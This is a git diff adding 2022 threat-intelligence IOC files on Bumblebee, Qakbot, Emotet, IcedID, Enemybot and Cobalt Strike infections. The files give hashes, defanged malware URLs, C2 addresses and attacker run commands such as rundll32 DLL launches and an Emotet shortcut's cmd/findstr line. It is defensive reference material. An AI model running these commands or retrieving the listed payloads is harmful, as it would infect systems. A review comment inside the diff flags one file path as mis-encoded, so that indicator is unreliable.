diff --git a/2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt b/2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt
new file mode 100644
index 0000000..667853e
--- /dev/null
+++ b/2022-04-05-IOCs-for-Bumblebee-and-Cobalt-Strike.txt
@@ -0,0 +1,37 @@
+2022-04-05 (MONDAY) - BUMBLEBEE INFECTION WITH COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1512146449345171459
+
+NOTES:
+
+- Bumblebee malware associated with threat actor EXOTIC LILY was reported by Google's Threat Analysis Group (TAG) in March 2022.
+
+- For more information, see: https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/
+
+- Was not able to recover Cobalt Strike binary from this infection example.
+
+ASSOCIATED MALWARE:
+
+- SHA256 hash: a3e023f9666dfacbbc028212682390de436a78e4291c512b0b9f022a05b138f8
+- File size: 2,555,904 bytes
+- File name: documents-0405-13.iso
+- File description: Malicious ISO file with Bumblebee malware
+
+- SHA256 hash: 9dfb32ed9b5756151623a8049eaa7785bf761601eb6c7165beff489cce31bb08
+- File size: 1,199 bytes
+- File name: documents.lnk
+- File description: Windows shortcut to run Blumblebee DLL
+- Shortcut: rundll32.exe setting.dll,IternalJob
+
+- SHA256 hash: 131f7e18bc3ea50cdcf74b618c24f5ae1b38594f8649d80538566b1cceeec683
+- File size: 2,502,144 bytes
+- File name: setting.dll
+- File description: Windows DLL for Bumblebee malware
+- Run method: rundll32.exe setting.dll,IternalJob
+
+TRAFFIC FROM AN INFECTED WINDOWS HOST:
+
+- 192.236.198[.]63 port 443 - 192.236.198[.]63 - Bumblebee HTTPS C2 traffic
+- 23.108.57[.]23 port 443 - cuhitiro[.]com - Cobalt Strike traffic
diff --git a/2022-04-12-IOCs-for-SpringShell-exploitation-by-Enemybot.txt b/2022-04-12-IOCs-for-SpringShell-exploitation-by-Enemybot.txt
new file mode 100644
index 0000000..a9ef8bb
--- /dev/null
+++ b/2022-04-12-IOCs-for-SpringShell-exploitation-by-Enemybot.txt
@@ -0,0 +1,74 @@
+2022-04-12 (TUESDAY) - SPRINGSHELL EXPLOITATION BY ENEMYBOT
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1513951086356406279
+
+NOTE:
+
+- At least 62 samples of Gafgyt-based Linux botnet, Enemybot, exploiting the SpringShell vulnerability, were spotted on VirusTotal on 2022-04-11 and 2022-04-12.
+
+- The SHA256 file hashes are listed below.
+
+00bc1ce81f79089670a7d2956df112ff29ee86d51ecad0d7fb5012d54cbfaf4a
+01c758742f333d897b6d6fead725d91841f8a17bed6fb7fcc1226d7bd9a70c12
+07177233647e1ff382dde4803bc0651e5b052112a5450bd78858d945c4bc2e0b
+0801d8f5c028457b5bad66917d39d17471659eb522c5813f893c76bf4bc3148e
+12be4047b17c39993ea540b7bd857a665be2e205d455d0664dd4a96d763348ce
+12fd76f12e860d2931cc7e8b263933d9b82525f10116738fbd493c7666471cc5
+1416877edd6c4b18cbca4598b4c91b023113c51e9e8dbaef2266254727f223dc
+1adfc65c5ba75668d6f45e65ccb31100f9f8bf510435960b6038c7c7b746be62
+1c441e606233bbac68175731b0f35c0760a2da8e4002ef3ea36f341cf342cc79
+200c0d1c71d5c3faaba9ec5abcd1445b34c14fa66001557c11c574776b8baea7
+208ffbdc18d19de0691d523fc3acddc1390223d8f5a5e62f2526e26626086c38
+23e718def31c7a37bcbfae15a4eb0725e106f7b73b238d9ae42a19036e618dd7
+27b5e1f1bbde28fbd2d6d31f64a1b96c32d064a23f5832c7f6b04f32886c1929
+2c91a412ecedf9e6998997d90467398e2a55373c0b9b3395848184210705d7e6
+2ec4d6fad356e771ecc18491d931c3cf510e10d3ff49d8ab06e0da0e5eb8d120
+2f08cab642d4da5ab2a1d9ed6e816b5dd20bff21b10b7014d0ff19bde5b7890f
+336008e2b7f2bf194a44984b36d0594d03103e3636540273eed82c01af407001
+3b1bbec6edbaf072ef57fa257279497e74ebf80ff038d21a4043ac79656d7e28
+3d73aea855fc012e2a49a4c98f293dc4836a284ddf7481486b9948f6b6adbc00
+4485c594dce7c8444c2d9fbffc180a44795c98531d41ebd9a46f76ca052c8fa3
+4aa7b83b9d83db23b2a3dbfb6078a866928fc61655d0bc8ecc2fce5c3679c6b4
+4c31d578ad4bac892f0dcb307080f24196360765fe007c316c6f1878f9310d03
+4dc210da4efc55c32442a87eeeb3c45fc1e4001a99536503698708ff668ff262
+563cb8c26e7a5867f24f3ba21ad1d7cf923703e02788a96984c6a7f38f2d481e
+57594c0ebdf7365f6ccd6a576f32870e14bd87e627789de43626093e51d63050
+59845f9e4a5ad158c9021dbe7dcdec5ec7fe388549c01ca6207badfb24133d2b
+5b266c9bd119725dda27c91c08dd3b61659f2b91a487b420b21514f3235cbbb9
+5d38e81de505e6eeb887e10566ac09796db4bfeb9f4c13054c490064f1ff2eba
+5dc6318d8d50fb903ee4a79080769fd25a04ec6633cab32b0f890875c0780290
+5f6b65a372bfe982bca49e99f1ba17a57cbb5976a007bc07f1f645a2e9e6c22a
+631ddce47e2af455dcd985eb5f5e3fd8319b16b3db97b8ed915bba077d12ce49
+6381ea65b83ea2e2a4eed2c9f6fe6c2b0e31d4df2daf8201fa901782bfa5b019
+65dbdc04b1574683304457cd7c78541ead165201f89a1b2a7285313bc9b08bff
+72d34977b8f4b4734e89da4a1e8a9468173b69364ebf6150ab0fe3605123e98e
+73808dc4480bf696a4abc90c41b988886a6fa749c0b56098958471bb9c867af7
+81891ec2d391fb3ef95f04aa7c13cd99a7c4f939fec7ccddada2dc4811b78411
+8f8f61f95649f523e12533051dd55dd0d4da84da56873cb544dd12f01ea81ee0
+9482dccd63983272e610041d4bbf262b9e2ac23d721c097074e405fcd9a897c0
+97684ae157687ede7bf91bebe6d495da66e8496c0c273255a8e6134697994966
+98121e22dcb0b5ff2a05e49072b623ffd497b08c655ad200352b8fbfd94f4bc3
+9936afc821410d4ee8cc0a3d0bce6ef6b490392f4f13ae31f84a94c959a2fc03
+a00f249d4d86941b2b2d66c3431467ae8abac4ef8111c3b9d0f5b631e07d702b
+b11676e7e98d54c983b87a6e69054e70670169bdba0bf440eafcf06267b485b3
+b351a8b608f6e223ad8afd75d2f7121a4c7eec04ae1fd501619204bdac35a8ba
+b3f05948bdcff16464125fbb87bd6dab3b55510b8ed093abb37a7ba2b7e78297
+c1566f52e2f69008aa9afd6ea9a82972bdf2a51d90a7a85842858134ea74de40
+c3bff052096f85673dcbdf9038114d55b9a7b9b84b4049caee5612d50a8a734b
+c495527a844ddb6220ec8c333477e8d630b7552db38082a32f692f3b892ca9ce
+cadac6b80362ccc22e5f25ec1c57c43d66c893539306193a271ad78afa7d47c0
+d1f4dfba13d5407d367a847f213826f3a434e7af8f3daae482909473550c4e89
+d437b362e0bade3bdbb0e0e729b28b0068225671eda83df4309cea5898353289
+dd607c9a74ce0183b94b06e550f77814678c23cb11c67841e5a75c842c36c0ad
+e880481a7a40b7b13dc50241646d64a61814c11f0e7edb65006fc61da4f9f52a
+ea0762fbdd49c6be02ef533ca14c8f33303ce21f3510ab12b1164a2299480cfe
+edff8ce767dcec6300e05e7eb0712ab25673571503c2ac68690c7d257d2b2e29
+efc1fc9efefb96e31f887681bcdea337c3ab3312b4d55c7541b1e7f272a1bf41
+effddfe0e246b069f48e91e03dcd361998b773283834d9ebfd9703369bf663e4
+f0b828e78df7156fd9213947c1542e9aedcb797595da5374bce05cc5af5c8255
+f0cd9e36e2cdf45e59efab2761d606debd085fb7a6477b8be0e3cc813a279d42
+f566e89c45af2300900a522ab004bb1ac1a63301f4dac99e0de85ac5a2aa83f6
+f97d74ac49a75219ac40e8612a0ec0a829ed9daac2d913221115562c219c99b7
+fd07ef316187f311bec7d2ff9eb793cc3886463ebae9445c9f89903b66727832
diff --git a/2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt b/2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt
new file mode 100644
index 0000000..3d1b4cc
--- /dev/null
+++ b/2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt
@@ -0,0 +1,55 @@
+2022-04-14 (THURSDAY) - AA DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1514716895861256192
+
+INFECTION CHAIN:
+
+- email --> link --> zip --> extracted .msi file --> dropped Qakbot DLL --> Qakbot C2 --> Cobalt Strike
+
+NOTES:
+
+- Also known as TA577, aa distribution Qakbot started using .msi files in downloaded zip archives as of Monday 2022-04-11.
+- Reference: https://twitter.com/k3dg3/status/1513514251788464132
+- Reference: https://twitter.com/Max_Mal_/status/1513539551070937093
+
+- Saw the same Cobalt Strike C2 domain and IP address on Monday 2022-04-11 for 172.241.27[.]237 using kuxojemoli[.]com.
+- Reference: https://twitter.com/malware_traffic/status/1513556366346137605
+
+ASSOCIATED MALWARE:
+
+- SHA256: 5c3b39ec6ffbfe05ac0246d98d6ce7287de442896c90d24e256a03da21f3ada9
+- File size: 817,162 bytes
+- File location: hxxps://geobram[.]com/ist/iseerroaemtefspidnle
+- File location: hxxps://geobram[.]com/ist/NO_2950435796.zip
+- File name: iseerroaemtefspidnle.zip
+- File description: ZIP archive downloaded from link in email
+
+- SHA256: 2b9861436d994bee6a332cbaf71a9fd6f157089062f414207c9effe84bf556e5
+- File size: 977,920 bytes
+- File name: 281.msi
+- File description: MSI file extracted from above ZIP archive
+
+- SHA256: f642fe6b372183af134c1c8cd5f806de37dcea27d6eab2ef53663d61795416e0
+- File size: 1,399,296 bytes
+- File location: C:\Users\[username]\AppData\Local\SetupTest\1.dll
+- File description: Windows DLL for Qakbot (aa distribution tag)
+- Run method: regsvr32.exe [filename]
+
+TRAFFIC TO DOWNLOAD THE INITIAL ZIP ARCHIVE:
+
+- 208.91.198[.]131 port 443 - hxxps://geobram[.]com/ist/iseerroaemtefspidnle
+- 208.91.198[.]131 port 443 - hxxps://geobram[.]com/ist/NO_2950435796.zip
+
+QAKBOT C2 TRAFFIC:
+
+- 47.158.25[.]67 port 443 - attempted TCP connections
+- 45.46.53[.]140 port 2222 - HTTPS traffic
+- port 443 - www.openssl[.]org - connectivity check (not inherently malicious)
+- 23.111.114[.]52 port 65400 - TCP traffic
+- 75.99.168[.]194 port 443 - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 172.241.27[.]237 port 443 - kuxojemoli[.]com
diff --git a/2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt b/2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt
new file mode 100644
index 0000000..ac60668
--- /dev/null
+++ b/2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt
@@ -0,0 +1,51 @@
+2022-04-19 (TUESDAY) - MALWARE INFECTION FROM BRAZIL EMAIL
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1516878897341681665
+
+INFECTION CHAIN:
+
+- email --> link --> zip --> .msi file --> DLL run by legit EXE --> post-infection traffic
+
+EMAIL HEADERS:
+
+- Date: Tue, 19 Apr 2022 21:20:30 +0000 (UTC)
+- Return-Path:
+- Received: from mail51.notadobairro[.]com (mail51.notadobairro[.]com [137.184.189[.]240])
+- Subject: Nota Fiscal Eletronica 8286498
+- From: prefeitura@prefeitura.sp.gov.br [spoofed sender]
+
+LINK FROM MESSAGE TEXT:
+
+- hxxps://projeto-nota[.]com/?cid=[recipient's email address]
+
+ASSOCIATED MALWARE:
+
+- SHA256 hash: 3a4da1e6bbd311133b1232f8b4080ebd2a9e747afd96f8c3eadde8f1dd949d84
+- File size: 14,940,993 bytes
+- File location: hxxp://download.kicks-ass[.]org/PREFEITURAfds.zip
+- File name: PREFEITURAfds.zip
+- File description: zip archive downloaded from link in email
+
+- SHA256 hash: de8dc757ae084e180d13d97afb93b64b678a786dc968657c85004b5a84fef10d
+- File size: 15,470,080 bytes
+- File name: ji89UHECQSfP.msi
+- File description: MSI file extracted from the above zip archive
+
+- SHA256 hash: 3847c039ec8f75424201032f288b86d79822cd9c993e9b9f51bd2f904eed4dfe
+- File size: 14,278,656 bytes
+- File location: C:\Users\[username]\AppData\Roaming\Segun‡a\Aplicativo\zlibai.dll
+- File description: Malware DLL installed from above MSI file
+- Run method: loaded by legitimate file intune.exe in the same directory
+
+INFECTION TRAFFIC:
+
+- 208.109.26[.]144 port 80 - projeto-nota[.]com - GET /?cid=[recipient's email address]
+- 20.226.20[.]129 port 80 - sgfghfhdghdd.doesntexist[.]org - GET /
+- 20.226.20[.]129 port 80 - sgfghfhdghdd.doesntexist[.]org - GET /nfe.jpg
+- 20.226.20[.]129 port 80 - sgfghfhdghdd.doesntexist[.]org - GET /loading2.gif
+- 20.226.20[.]129 port 80 - sgfghfhdghdd.doesntexist[.]org - GET /favicon.ico
+- 20.226.20[.]129 port 80 - gssfsfgf.scrapping[.]cc - GET /354386&tyGUuguyGUYGU435483962329378273892738973492380403UIGIUGGGG438746783/
+- 20.226.20[.]129 port 80 - download.kicks-ass[.]org - GET /PREFEITURAfds.zip
+- 20.226.20[.]129 port 80 - iofajfioshnguiosfui.from-pa[.]com - POST /novidades/inspecionando.php
diff --git a/2022-04-25-IOCs-for-Emotet-epoch4.txt b/2022-04-25-IOCs-for-Emotet-epoch4.txt
new file mode 100644
index 0000000..1e0ba3a
--- /dev/null
+++ b/2022-04-25-IOCs-for-Emotet-epoch4.txt
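Review bot: The file location `C:\Users\[username]\AppData\Roaming\Segun‡a\Aplicativo\zlibai.dll` in the ASSOCIATED MALWARE section of 2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt contains a mis-encoded character (`‡`), so the path as committed will not match what is on an infected host and is unreliable as a file-path indicator. It looks like a non-ASCII directory name was mangled on paste; I'd confirm the segment against the original capture and, if it cannot be recovered, mark it, e.g. `Segun‡a [directory name mis-encoded; verify]`. The `Return-Path:` header on the line above has no value at all, which may be a rendering artifact worth restoring or noting as blank.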
@@ -0,0 +1,92 @@
+2022-04-25 (MONDAY) - EMOTET EPOCH 4 MALSPAM WITH WINDOWS SHORTCUT (.LNK) ATTACHMENTS
+
+REFERENCE:
+
+- reference unavailable
+
+NOTES:
+
+- On Friday 2022-04-22, Emotet stopped sending Excel spreadsheets as attachments and began using Windows shortcut (.lnk) files.
+
+- The .lnk file can be directly attached to the emails, or they can be contained in a password-protected zip archive.
+
+- These shortcuts have embedded script appended to the file.
+
+- The shortcut command copys the embedded script to a .vbs file saved to and run from the victim's AppData\Local\Temp directory.
+
+ATTACHMENTS: .LNK FILES:
+
+- f1228e3fc8d14b670dcd05a73e9d8082c5468e7f869c04e4e2a192c24029cb0b Electronic form 04.25.2022, USA.lnk
+- 4cfaec3d5afa0acd05aeea77cbd77f705659716849c4ffb1c00711e018e7e1d9 Electronic form 04.25.2022.lnk
+- de32b7042c9acd86b5f446c334a415f5f38df8dd71f74d0f826dc3e04e8b735c Electronic form Dt 04.25.2022.lnk
+- e3a4e4b4fd779cb449b69d2831fe49e22c95eb917bc875a8ff9dea69699a2b75 Form Dt 04.25.2022.lnk
+- 193cf39b5c1d4174fbecc8ed34d476eab20129659e2f16a71341a53f3649819f form 04.25.2022.lnk
+
+ATTACHMENTS: PASSWORD-PROTECTED ZIP ARCHIVES:
+
+- 4dfcc035699f72fe818d3862985043d7c9507c8fb41fa6daff6b040bd35f2fdb Electronic form Dt 04.25.2022, United States.zip
+- 175926369c94fbbf586767836fdeb3d1eb23e0b6adaaa4f62d0437d7c1c3ffc5 Form 04.25.2022, US.zip
+- b4cef643571c26d7c96180c665250b3e2a64e6ff6957458c56dc8842640e20b9 form 04.25.2022, US.zip
+- 212b5544fd55f5d5060beec77d80ea600d29fbbce8cd3d6d7ab54af369e59363 INV 2022-04-25_1114, US.zip
+- 6bdac1eb612c6a9f7725a87d19d6a4e9f24012185d33cad66f0234cf0d572f07 INV 2022-04-25_1237, US.zip
+
+.LNK FILES EXTRACTED FROM THE ABOVE ZIP ARCHIVES:
+
+- 846a1548e1f1eb25c026060be4b132aef84c6e72d459ae4ba586e10bd3452e89 Electronic form Dt 04.25.2022, United States.lnk
+- 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 Form 04.25.2022, US.lnk
+- de494235193ae2144df12e3b5dddfee7f18fe155b71b8d816a010cf2ef95ed5a form 04.25.2022, US.lnk
+- 406a50eb3bd3815a556e35015d65918b82cba4780c413f2028e3f8c346a5c283 INV 2022-04-25_1114, USA.doc.lnk
+- 19c4740ef48735d8fca435e54bb5ca4f0dea47c14d0a8ebf6f6278469b901eec INV 2022-04-25_1237, United States.doc.lnk
+
+EXAMPLES OF WINDOWS SHORTCUT COMMANDS:
+
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Electronic form 04.25.2022, USA.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Electronic form 04.25.2022.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Electronic form Dt 04.25.2022, United States.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Electronic form Dt 04.25.2022.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "form 04.25.2022.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Form 04.25.2022, US.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "form 04.25.2022, US.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Form Dt 04.25.2022.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "INV 2022-04-25_1114, USA.doc.lnk"
+- cmd.exe ..\..\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "INV 2022-04-25_1237, United States.doc.lnk"
+
+VBS SCRIPT APPENDED TO .LNK FILES FOR EMOTET:
+
+- SHA256 hash: c9182a9101d90a24fc6367d62e31abdd930b2c7f5e69d53d65468259ce1e295d
+- File size: 3,008 bytes
+- File location: C:\Users\[username]\AppData\Local\Temp\YlScZcZKeP.vbs
+
+URLS IN VBS SCRIPT TO RETRIEVE EMOTET DLL:
+
+- hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
+- hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
+- hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
+- hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
+- hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
+- hxxp://colegiounamuno[.]es/cgi-bin/E/
+
+EXAMPLE OF 64-BIT DLL FOR EMOTET:
+
+- SHA256 hash: d0c671e54b36dce0f652ef7fa8e18d609a89efff1a05b133d7c2cd536f65f15f
+- File size: 543,744 bytes
+- File location: C:\Users\[username]\AppData\Local\Kfichjg\cbun.zia
+- File type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
+- File description: 64-bit DLL for Emotet
+- Run method: regsvr32.exe [filename]
+
+EMOTET C2 TRAFFIC:
+
+- 49.231.16[.]102 port 8080 - HTTPS traffic
+- 51.210.176[.]76 port 443 - HTTPS traffic
+- 91.207.181[.]106 port 8080 - HTTPS traffic
+- 93.104.209[.]56 port 8080 - HTTPS traffic
+- 131.100.24[.]199 port 7080 - HTTPS traffic
+- 138.197.147[.]101 port 443 - HTTPS traffic
+- 138.201.142[.]73 port 8080 - attempted TCP connections
+- 176.31.163[.]17 port 8080 - HTTPS traffic
+- 217.160.107[.]189 port 8080 - HTTPS traffic
+
+EMOTET SPAMBOT TRAFFIC:
+
+- various IP addresses over various TCP ports - encrypted SMTP traffic
diff --git a/2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt b/2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt
new file mode 100644
index 0000000..5508e4f
--- /dev/null
+++ b/2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt
@@ -0,0 +1,71 @@
+2022-05-03 (TUESDAY) - CONTACT FORMS CAMPAIGN --> BUMBLEBEE --> COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1521831026024239107
+
+CHAIN OF EVENTS:
+
+- Contact form-generated email --> link to URL at storage.googeapis.com --> ISO file download --> Bumblebee infection --> Cobalt Strike activity
+
+NOTES:
+
+- "Contact Forms" is a campaign that has distributed IcedID, Sliver, BazarLoader, and more recently Bumblebee malware.
+
+- This campaign uses a web site's contact form to email recipients messages with malicious links to download malware.
+
+- The Contact Forms campaign most often uses a DMCA violation notice that directs victims to a "Stolen Images Evidence" web page hosted on a URL at storage.googeapis.com.
+
+- In 2021 the Contact Forms campaign also used a "DDoS Attack Proof" theme.
+
+- An initial write-up about this campaign can be found at: https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/
+
+MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST:
+
+- SHA256 hash: c632b56628303f523b22a26231ae80836fed54df87c8a004f2d348d1b6f951b2
+- File size: 4,521,984 bytes
+- File name: StolenImages_Evidence.iso
+- File description: ISO file downloaded through link in contact forms email
+
+- SHA256 hash: 3c600328e1085dc73d672d068f3056e79e66bec7020be6ae907dd541201cd167
+- File size: 1,623 bytes
+- File location: StolenImages_Evidence.iso\documents.lnk
+- File description: Windows shortcut in the above ISO file
+- Windows shortcut: %windir%\system32.exe /c start
+rundll32.exe mkl2n.dll,KXlNkCkgFC
+
+- SHA256 hash: 0a9efce2cb38eb9e215d4ea308ccdc711659ab75b124dfd49561d6226c431ac2
+- File size: 3,023,872 bytes
+- File location: StolenImages_Evidence.iso\mkl2n.dll
+- File location: C:\ProgramData\96796b3c800e87fc\d99821d3530f702f.dll
+- File description: Bumblebee malware DLL
+- Run method: rundll32.exe [filename],KXlNkCkgFC
+
+- SHA256 hash: 330b74d26d0f25bd9b7cc147c9641241fea4a2a65965039c7a437ef739e51521
+- File size: 140 bytes
+- File location: C:\ProgramData\96796b3c800e87fc\d99821d3530f702f.vbs
+- File description: VBS file made persistent through scheduled task, used to run Bumblebee malware DLL
+
+MALWARE NOTE:
+
+- No binaries for Cobalt Strike were found saved to disk during a forensic investigation on the infected Windows host.
+
+EXAMPLE OF LINK IN CONTACT FORM-GENERATED EMAIL FOR "STOLEN IMAGES EVIDENCE" PAGE:
+
+- port 443 - hxxps://storage.googleapis[.]com/sf796cw3zbj6nk.appspot.com/sh/f/pub/m/0/fileyxuMxCXbRc2e.html?f=308238708665803200
+
+EXAMPLES OF URLS RETRIEVED BY THE ABOVE PAGE THAT RETURN BASE64 TEXT TO GENERATE ISO FILE:
+
+- 172.67.183[.]217 port 443 - hxxps://baronrtal[.]com/images/logo.jpg
+- 172.67.168[.]3 port 443 - hxxps://bunadist[.]com/images/logo.jpg
+
+BUMBLEBEE C2 TRAFFIC:
+
+- 45.153.243[.]93 port 443 - 45.153.243[.]93 - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 179.60.150[.]125 port 443 - HTTPS traffic
+- 172.93.201[.]12 port 443 - cevogesu[.]com - HTTPS traffic
+- 23.106.215[.]100 port 443 - titojukus[.]com - HTTPS traffic
+- 108.177.235[.]172 port 443 - xemigefav[.]com - HTTPS traffic
diff --git a/2022-05-10-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt b/2022-05-10-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt
new file mode 100644
index 0000000..37580e7
--- /dev/null
+++ b/2022-05-10-IOCs-for-Contact-Forms-IcedID-with-Cobalt-Strike.txt
@@ -0,0 +1,109 @@
+2022-05-10 (TUESDAY) - CONTACT FORMS CAMPAIGN PUSHES ICEDID (BOKBOT) WITH COBALT STRIKE
+
+REFERENCE:
+
+- original post unavailable
+- Repost at: https://twitter.com/cpardue09/status/1524481140622610432
+
+NOTES:
+
+- In recent weeks, the Contact Forms campaign has switched between pushing IcedID or pushing Bumblebee malware.
+- Threat actor behind the Contact Forms campaign is identified by Proofpoint as TA578.
+- More info at: https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming
+
+INFECTION CHAIN:
+
+- Message generated by web site's contact form page --> link --> .iso --> IcedID --> Cobalt Strike
+
+EXAMPLES OF URLS FOR "STOLEN IMAGES EVIDENCE" PAGE:
+
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/f9TOed0dsfi8I.html?d=013424360141997568
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/f9TOed0dsfi8I.html?d=079839232761821960
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/f9TOed0dsfi8I.html?f=683781869433531884
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fcVBtFOTc535o.html?d=767294819687278278
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/file33vCIi4VowMA.html?l=233013603241570417
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/file74UBbKNqO4XJ.html?h=322608764470150504
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/file74UBbKNqO4XJ.html?l=170461110458299507
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/file9FElTNKbCSuK.html?d=032781002493078383
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filehcA21fXJ3Pqq.html?d=747252265096336534
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filehcA21fXJ3Pqq.html?l=657889339028053050
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filer5SC4oHvKVpU.html?d=272216762893034065
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filer5SC4oHvKVpU.html?f=872038693564426236
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filer5SC4oHvKVpU.html?l=793720566165760989
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fileWrCADKEdgj2D.html?f=975205599657957920
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fileWrCADKEdgj2D.html?l=315799856865048946
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filex2o3u5r2JSLQ.html?d=41262147567753914
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/filexGOO60PY9LvE.html?f=534830888378933219
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fkdOib7kTYN6s.html?h=686086524291489104
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fZ5cijKJ1mC0i.html?f=602448158755477572
+- hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fZ5cijKJ1mC0i.html?f=690200262275133400
+
+URL CALLED BY "STOLEN IMAGES EVIDENCE" PAGE, RETURNED SCRIPT WITH BASE64 TEXT TO CREAT ISO FILE:
+
+- hxxps://olodaris[.]com/images/logo.jpg
+
+EXAMPLE OF DOWNLOADED ISO FILE AND ITS CONTENTS:
+
+- SHA256 hash: cc79f27ac41f863b9c9d8bf3dcc2738faa9d9691a1cf98c3f58351b20868cb05
+- File size: 2,097,152 bytes
+- File name: StolenImages_Evidence.iso
+- File description: ISO file downloaded from "Stolen Images Evidence" page
+
+- SHA256 hash: f7861ee8b3917e3746d44a769453334c9bf1b780213634ed9abd42f7873b0593
+- File size: 1,614 bytes
+- File name: documents.lnk
+- File description: Windows shortcut contained in the above .iso file
+- %windir%\system32\rundll32.exe olasius.dll,PluginInit
+
+- SHA256 hash: db91742b64c866df2fc7445a4879ec5fc256319e234b1ac5a25589455b2d9e32
+- File size: 590,336 bytes
+- File name: olasius.dll
+- File description: 64-bit DLL installer for IcedID
+- Run method: rundll32.exe [filename],PluginInit
+
+GZIP FILE RETRIEVED BY ICEDID INSTALLER TO CREATE LICENSE.DAT AND PERSISTENT ICEDID DLL:
+
+- SHA256 hash: 25c0746b4ac43ae65d5107c35659bf8f1d904fb3658d7c375ef1aa164a5cd200
+- File size: 917,404 bytes
+- File location: hxxp://yolneanz[.]com/
+- File type: gzip compressed data, was "Grass.txt", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 4811912
+
+LICENSE.DAT USED TO RUN PERSISTENT ICEDID DLL:
+
+- SHA256 hash: dbe9743c9c57247cb9275a23a84909dd78aca59f584df62197bde07cb87bd1ed
+- File size: 342,186 bytes
+- File location: C:\Users\[username]\AppData\Roaming\HopeDescribe\license.dat
+- File type: data binary
+- Note: Directory named "HopeDescribe" is unique to this infection
+
+PERSISTENT ICEDID DLL:
+
+- SHA256 hash: dc08348cc6976740042ac2ee5942a48e56d1f2cd038f5907bad179a5c93d1b8a
+- File size: 574,464 bytes
+- File location: C:\Users\[username]\AppData\Roaming\[username]\[username]\wafuleff4.dll
